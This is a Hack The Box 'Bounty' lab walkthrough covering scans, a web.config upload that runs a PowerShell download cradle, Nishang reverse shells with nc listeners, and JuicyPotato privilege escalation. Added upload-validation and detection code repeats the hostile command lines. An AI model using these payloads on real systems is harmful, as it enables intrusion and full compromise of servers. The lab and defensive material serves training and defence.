Bounty – Hack The Box Walkthrough Without Metasploit

This is a walkthrough of the Bounty box from Hack The Box, done without using Metasploit.

1. Reconnaissance

I learned about this awesome all-in-one nmap script called nmapAutomator. I will use it to run all my scans at once:

./nmapAutomator.sh 10.10.10.93 All

  • All = runs all the scans consecutively
  • Note: This scan took about 30 minutes to run for me. But you will get some info right away, so you can use that while the rest of the scan is completing. In the case of this scan, the most helpful bit (the default creds) didn’t show up until about 25 min into the scan. Just something to keep in mind as you are trying to allocate your time accordingly.

Here are the results that come back:

root@kali:/home/churr0s/Scripts/nmapAutomator# ./nmapAutomator.sh 10.10.10.93 All

Running all scans on 10.10.10.93


---------------------Starting Nmap Quick Scan---------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:02 PDT
Mon Oct 12 19:02:59 2020 [htb] Inactivity timeout (--ping-restart), restarting
Mon Oct 12 19:02:59 2020 SIGUSR1[soft,ping-restart] received, process restarting
Mon Oct 12 19:02:59 2020 Restart pause, 5 second(s)
Mon Oct 12 19:03:04 2020 TCP/UDP: Preserving recently used remote address: [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:04 2020 Socket Buffers: R=[212992->212992] S=[212992->212992]
Mon Oct 12 19:03:04 2020 UDP link local: (not bound)
Mon Oct 12 19:03:04 2020 UDP link remote: [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:04 2020 TLS: Initial packet from [AF_INET]185.77.152.22:1337, sid=e44d09ba a2c1107b
Mon Oct 12 19:03:04 2020 VERIFY OK: depth=1, C=UK, ST=City, L=London, O=HackTheBox, CN=HackTheBox CA, name=htb, emailAddress=info@hackthebox.eu
Mon Oct 12 19:03:04 2020 VERIFY KU OK
Mon Oct 12 19:03:04 2020 Validating certificate extended key usage
Mon Oct 12 19:03:04 2020 ++ Certificate has EKU (str) TLS Web Server Authentication, expects TLS Web Server Authentication
Mon Oct 12 19:03:04 2020 VERIFY EKU OK
Mon Oct 12 19:03:04 2020 VERIFY OK: depth=0, C=UK, ST=City, L=London, O=HackTheBox, CN=htb, name=htb, emailAddress=info@hackthebox.eu
Mon Oct 12 19:03:04 2020 Control Channel: TLSv1.2, cipher TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, 2048 bit RSA
Mon Oct 12 19:03:04 2020 [htb] Peer Connection Initiated with [AF_INET]185.77.152.22:1337
Mon Oct 12 19:03:05 2020 SENT CONTROL [htb]: 'PUSH_REQUEST' (status=1)
Mon Oct 12 19:03:05 2020 PUSH: Received control message: 'PUSH_REPLY,route 10.10.10.0 255.255.255.0,route-ipv6 dead:beef::/64,tun-ipv6,route-gateway 10.10.14.1,topology subnet,ping 10,ping-restart 120,ifconfig-ipv6 dead:beef:2::1014/64 dead:beef:2::1,ifconfig 10.10.14.22 255.255.254.0,peer-id 8,cipher AES-256-GCM'
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: timers and/or timeouts modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: --ifconfig/up options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: route options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: route-related options modified
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: peer-id set
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: adjusting link_mtu to 1625
Mon Oct 12 19:03:05 2020 OPTIONS IMPORT: data channel crypto options modified
Mon Oct 12 19:03:05 2020 Data Channel: using negotiated cipher 'AES-256-GCM'
Mon Oct 12 19:03:05 2020 Outgoing Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Mon Oct 12 19:03:05 2020 Incoming Data Channel: Cipher 'AES-256-GCM' initialized with 256 bit key
Mon Oct 12 19:03:05 2020 Preserving previous TUN/TAP instance: tun0
Mon Oct 12 19:03:05 2020 Initialization Sequence Completed
Nmap done: 1 IP address (1 host up) scanned in 101.76 seconds



---------------------Starting Nmap Basic Scan---------------------

No ports in quick scan.. Skipping!



----------------------Starting Nmap UDP Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:04 PDT
Nmap scan report for 10.10.10.93
Host is up.
All 1000 scanned ports on 10.10.10.93 are open|filtered

Nmap done: 1 IP address (1 host up) scanned in 201.64 seconds



---------------------Starting Nmap Full Scan----------------------

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:07 PDT
Initiating Parallel DNS resolution of 1 host. at 19:07
Completed Parallel DNS resolution of 1 host. at 19:07, 0.05s elapsed
Initiating SYN Stealth Scan at 19:07
Scanning 10.10.10.93 [65535 ports]
Discovered open port 80/tcp on 10.10.10.93
SYN Stealth Scan Timing: About 11.47% done; ETC: 19:12 (0:03:59 remaining)
SYN Stealth Scan Timing: About 23.09% done; ETC: 19:11 (0:03:23 remaining)
SYN Stealth Scan Timing: About 34.25% done; ETC: 19:11 (0:02:55 remaining)
SYN Stealth Scan Timing: About 45.94% done; ETC: 19:11 (0:02:22 remaining)
SYN Stealth Scan Timing: About 57.06% done; ETC: 19:11 (0:01:54 remaining)
SYN Stealth Scan Timing: About 68.80% done; ETC: 19:11 (0:01:22 remaining)
SYN Stealth Scan Timing: About 80.22% done; ETC: 19:11 (0:00:52 remaining)
Completed SYN Stealth Scan at 19:11, 263.77s elapsed (65535 total ports)
Nmap scan report for 10.10.10.93
Host is up (0.087s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 263.91 seconds
           Raw packets sent: 131262 (5.776MB) | Rcvd: 785 (156.144KB)


Making a script scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:11 PDT
Nmap scan report for 10.10.10.93
Host is up (0.081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Bounty
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.96 seconds



---------------------Starting Nmap Vulns Scan---------------------

Running CVE scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:12 PDT
Nmap scan report for 10.10.10.93
Host is up (0.084s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 10.11 seconds


Running Vuln scan on all ports

Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-12 19:12 PDT
Nmap scan report for 10.10.10.93
Host is up (0.081s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 7.5
|_clamav-exec: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-server-header: Microsoft-IIS/7.5
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-vuln-cve2015-1635: 
|   VULNERABLE:
|   Remote Code Execution in HTTP.sys (MS15-034)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2015-1635
|       A remote code execution vulnerability exists in the HTTP protocol stack (HTTP.sys) that is
|       caused when HTTP.sys improperly parses specially crafted HTTP requests. An attacker who
|       successfully exploited this vulnerability could execute arbitrary code in the context of the System account.
|           
|     Disclosure date: 2015-04-14
|     References:
|       https://technet.microsoft.com/en-us/library/security/ms15-034.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1635
| vulners: 
|   cpe:/a:microsoft:iis:7.5: 
|     	SMNTC-56440	5.0	https://vulners.com/symantec/SMNTC-56440
|     	SMNTC-56439	2.1	https://vulners.com/symantec/SMNTC-56439
|     	SMNTC-43140	0.0	https://vulners.com/symantec/SMNTC-43140
|     	SMNTC-43138	0.0	https://vulners.com/symantec/SMNTC-43138
|_    	SMNTC-40573	0.0	https://vulners.com/symantec/SMNTC-40573
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 261.10 seconds



---------------------Recon Recommendations----------------------


Web Servers Recon:

gobuster dir -w /usr/share/wordlists/dirb/common.txt -l -t 30 -e -k -x .html,.asp,.aspx,.php -u http://10.10.10.93:80 -o recon/gobuster_10.10.10.93_80.txt
nikto -host 10.10.10.93:80 | tee recon/nikto_10.10.10.93_80.txt





Which commands would you like to run?
All (Default), gobuster, nikto, Skip <!>

Running Default in (1) s:  


---------------------Running Recon Commands----------------------


Starting gobuster scan

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.93:80
[+] Threads:        30
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Show length:    true
[+] Extensions:     html,asp,aspx,php
[+] Expanded:       true
[+] Timeout:        10s
===============================================================
2020/10/12 19:17:06 Starting gobuster
===============================================================
http://10.10.10.93:80/aspnet_client (Status: 301) [Size: 159]
http://10.10.10.93:80/transfer.aspx (Status: 200) [Size: 941]
http://10.10.10.93:80/uploadedfiles (Status: 301) [Size: 159]
===============================================================
2020/10/12 19:19:34 Finished
===============================================================

Finished gobuster scan

=========================

Starting nikto scan

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.93
+ Target Hostname:    10.10.10.93
+ Target Port:        80
+ Start Time:         2020-10-12 19:19:35 (GMT-7)
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/7.5
+ Retrieved x-powered-by header: ASP.NET
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Retrieved x-aspnet-version header: 2.0.50727
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST 
+ 7863 requests: 0 error(s) and 7 item(s) reported on remote host
+ End Time:           2020-10-12 19:31:40 (GMT-7) (725 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

Finished nikto scan

=========================



---------------------Finished all Nmap scans---------------------


Completed in 29 minute(s) and 15 second(s)

We have one port open so we’ll be using that to try to get into the box:

Port 80: running Microsoft IIS httpd 7.5


2. Enumeration

Visit the IP address in a browser:

Nothing helpful here so try viewing the page source to see if anything sticks out:

Nothing that seems to be helpful there either. During our scan, gobuster found two directories, aspnet_client and uploadedfiles. Both return errors.

Let’s try a stronger gobuster scan to see if we can find anything else:

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -l -t 30 -e -k -x .asp,.aspx,.txt -u http://10.10.10.93:80 -o gobuster-medium.txt
  • dir: directory mode
  • -w: wordlist
  • -l: include the length of the response body in the output
  • -t: thread count
  • -e: expanded mode, print full URLs
  • -k: skip SSL certificate verification
  • -u: URL
  • -o: output file location
  • -x: file extensions to search for

And we get back an additional result: http://10.10.10.93:80/transfer.aspx (you will also get this result back when running a scan with dirsearch). Visiting this shows it is an upload form:

3. Initial foothold

Since we have a directory called /uploadedfiles and an upload form called transfer.aspx, we can assume that if we upload a file it will go to that directory. But trying to upload an .aspx or .asp file does not work. Neither does a .txt. However, trying a .png file works!


4. Exploit

One thing we can do to exploit an upload form on IIS is to upload a web.config file. This file is usually present in the root of the web directory and holds options and configuration for the site, but IIS also honours a web.config placed in any subdirectory it serves, so a copy dropped into /uploadedfiles applies to that directory. The one below maps *.config files to the classic ASP handler (asp.dll) and removes the request-filtering rules that would normally keep the file from being served, so the ASP code appended after the XML runs when the file is requested. Here is what we need to do:

  1. Grab the Nishang repository and then copy the Invoke-PowerShellTcp.ps1 script over to your working directory
  2. Edit the copied version of the script, and add Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.20 -Port 7500 to the bottom. This triggers the command to auto-run instead of just loading modules to memory
  3. Open a new terminal window and open a listener with nc -lvnp 7500
  4. Open another new terminal window and start a python http server python -m SimpleHTTPServer 80
  5. Create the web.config file using the below code:
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
    <system.webServer>
      <handlers accessPolicy="Read, Script, Write">
         <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
      </handlers>
      <security>
         <requestFiltering>
            <fileExtensions>
               <remove fileExtension=".config" />
            </fileExtensions>
            <hiddenSegments>
               <remove segment="web.config" />
            </hiddenSegments>
         </requestFiltering>
      </security>
   </system.webServer>
</configuration>
<%@ Language=VBScript %>
<%
  call Server.CreateObject("WSCRIPT.SHELL").Run("cmd.exe /c powershell.exe -c iex(new-object net.webclient).downloadstring('http://10.10.14.22/Invoke-PowerShellTcp.ps1')")
%>

Make sure to edit the bottom line to use your own attack box IP instead of 10.10.14.22.
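The upload form on this box blocked .asp, .aspx and .txt by name but still accepted web.config, which is why the trick above works. The following is an added example, not code from the walkthrough, of the server-side check an upload handler needs to close that gap: an allow-list of extensions, a magic-byte check on the content, and a reserved-name list. The accepted types, the RESERVED_NAMES set and the name pattern are my assumptions about what such a form should take.

```python
# Added example, not code from the walkthrough: the kind of server-side check
# an upload handler needs so that a stray web.config (or an .aspx hiding
# behind a double extension) is rejected even when a deny-list misses it.
import os
import re
from typing import Tuple

# Allow-list of accepted extensions and the magic bytes each one must start
# with. Assumed policy: the transfer form is only meant to take images.
ALLOWED = {
    ".png": b"\x89PNG\r\n\x1a\n",
    ".jpg": b"\xff\xd8\xff",
    ".gif": b"GIF8",
}

# Names IIS/ASP.NET interpret as configuration; never acceptable as uploads.
RESERVED_NAMES = {"web.config", "global.asax", "machine.config"}

# The file stem may only be a plain token: no dots, so "shell.aspx.png" fails.
SAFE_STEM = re.compile(r"^[a-z0-9_-]{1,64}$")


def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, reason) for an uploaded file name and its bytes."""
    # Drop any directory part a client may smuggle in ("..\\..\\web.config").
    base = os.path.basename(filename.replace("\\", "/")).lower()
    if base in RESERVED_NAMES:
        return False, "reserved configuration name"
    stem, ext = os.path.splitext(base)
    if not SAFE_STEM.match(stem):
        return False, "name contains disallowed characters or extra dots"
    if ext not in ALLOWED:
        return False, f"extension {ext or '(none)'} is not allow-listed"
    # Check the claimed type against the content, not just the name.
    if not data.startswith(ALLOWED[ext]):
        return False, "content does not match the extension"
    return True, "ok"


def filter_batch(uploads):
    """Apply validate_upload to (name, bytes) pairs; return the rejected names."""
    return [name for name, data in uploads if not validate_upload(name, data)[0]]
```

Re-encoding accepted images server-side (decode and write a fresh file) is the stronger follow-up control, since it discards any trailing payload a polyglot image might carry.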

Now that we have the web.config file, upload it using the same upload form we used before. Once uploaded, you should be able to visit the location of the file to trigger the exploit:

And if the exploit works, you should now see a reverse shell spawned on your listener!

Running whoami shows we are a user called merlin, and we can grab that user’s flag. Note that you need to run ls -force to see the hidden user.txt file:

Since we are not root though, we’ll need to do some privilege escalation to grab the root flag.


5. Privilege escalation

Let’s run systeminfo to do some additional enumeration on this box and see what it tells us:

No hotfixes! That means we probably have a wide array of exploits to choose from for privilege escalation. Let’s also run whoami /priv:

We can see that merlin has SeImpersonatePrivilege enabled, which means we can use JuicyPotato for privilege escalation. Here’s what we need to do:

  1. Grab the latest JuicyPotato release here and upload it to merlin using (new-object net.webclient).downloadfile('http://10.10.14.22:80/jp.exe', 'C:\Users\merlin\Desktop\jp.exe')
    • I’m using port 80 because that’s the port I used to set up my simple http server earlier
  2. Run the executable to view what arguments it takes (./jp.exe). We can see it takes the following:
    • -t: Create process call. Let’s use * to test both options
    • -p: The program to run. In our case we’re going to create a file that sends a reverse shell back to our attack machine
    • -l: COM server listen port. This can be anything so let’s use 4444
  3. Copy the nishang Invoke-PowerShellTcp.ps1 script over to your working directory again (give it a different name than the first one you copied over)
  4. Add this line to the end of the nishang script: Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.22 -Port 6666
    • Use your attack machine IP
    • the port will be a port number you use to open up a second listener
  5. Create a .bat file that will download our nishang shell script and run it. Put the following in the file: powershell -c iex(new-object net.webclient).downloadstring('http://10.10.14.22:80/shell-2.ps1')
    • use your attack machine’s IP
    • port 80 which is what we’re using for our simple http server
    • the name of your nishang script
  6. Now move the .bat file over to merlin: (new-object net.webclient).downloadfile('http://10.10.14.22:80/shell.bat', 'C:\Users\merlin\Desktop\shell.bat')
    • use your attack machine’s IP
    • port 80 which is what we’re using for our simple http server
    • path where you want to download it to on merlin
  7. Open up another terminal window and start a new listener on port 6666 (the port we added to the bottom of our nishang script): nc -nlvp 6666
  8. Then run the JuicyPotato executable on merlin, from the directory you downloaded the .bat and jp.exe files to. Running this executable will try to get a token that impersonates SYSTEM. Then it will run the shell.bat file with elevated privileges and spawn a new reverse shell: PS C:\Users\merlin\Desktop> ./jp.exe -t * -p shell.bat -l 4444

And if all goes well, you’ll see a new reverse shell spawned on your second listener:

Running a whoami shows we are root, so grab the root flag!
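From the defender’s side, the two chains this box produces (the IIS worker spawning cmd.exe with a PowerShell download cradle, and a process started by merlin launching a child under a SYSTEM token) are both visible in process-creation telemetry. The following is an added example, not part of the walkthrough, of detection logic run over constructed events; the EVENTS records mirror the command lines shown above, and the field names (parent, parent_user, image, user, cmdline) are assumptions rather than any product’s schema.

```python
# Added example, not from the walkthrough: detection logic for the two process
# chains a web.config handler abuse and a JuicyPotato-style token impersonation
# produce. EVENTS is constructed to resemble process-creation telemetry for
# this box; the field names are assumptions, not a specific product's schema.
from typing import Dict, List, Tuple

WEB_WORKERS = {"w3wp.exe"}          # IIS application-pool worker process
SHELLS = {"cmd.exe", "powershell.exe"}
SYSTEM = "nt authority\\system"

Event = Dict[str, str]

EVENTS: List[Event] = [
    # Benign: the worker compiling a page through the .NET compiler.
    {"parent": "w3wp.exe", "parent_user": "iis apppool\\defaultapppool",
     "image": "csc.exe", "user": "iis apppool\\defaultapppool",
     "cmdline": "csc.exe /noconfig /t:library"},
    # Section 4: uploaded web.config maps .config to asp.dll, which runs cmd.exe.
    {"parent": "w3wp.exe", "parent_user": "bounty\\merlin",
     "image": "cmd.exe", "user": "bounty\\merlin",
     "cmdline": "cmd.exe /c powershell.exe -c iex(new-object net.webclient)"
                ".downloadstring('http://10.10.14.22/Invoke-PowerShellTcp.ps1')"},
    # Section 5: jp.exe started by merlin launches shell.bat under a SYSTEM token.
    {"parent": "jp.exe", "parent_user": "bounty\\merlin",
     "image": "cmd.exe", "user": SYSTEM,
     "cmdline": "cmd.exe /c C:\\Users\\merlin\\Desktop\\shell.bat"},
]


def classify(ev: Event) -> List[str]:
    """Return the names of every rule the event trips (empty list if benign)."""
    parent, image = ev["parent"].lower(), ev["image"].lower()
    cmd = ev["cmdline"].lower()
    hits = []
    if parent in WEB_WORKERS and image in SHELLS:
        hits.append("web-worker-spawned-shell")
    if "downloadstring" in cmd and "iex" in cmd:
        hits.append("powershell-download-cradle")
    # Heuristic: a SYSTEM process whose parent ran as an ordinary user is the
    # signature of token impersonation; tune against service-control paths.
    if ev["user"].lower() == SYSTEM and ev["parent_user"].lower() != SYSTEM:
        hits.append("user-parent-spawned-system-child")
    return hits


def scan(events: List[Event]) -> List[Tuple[int, str]]:
    """Run classify over a batch; return (event index, rule name) pairs."""
    return [(i, rule) for i, ev in enumerate(events) for rule in classify(ev)]


if __name__ == "__main__":
    for idx, rule in scan(EVENTS):
        print(f"event {idx}: {rule} -> {EVENTS[idx]['cmdline']}")
```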
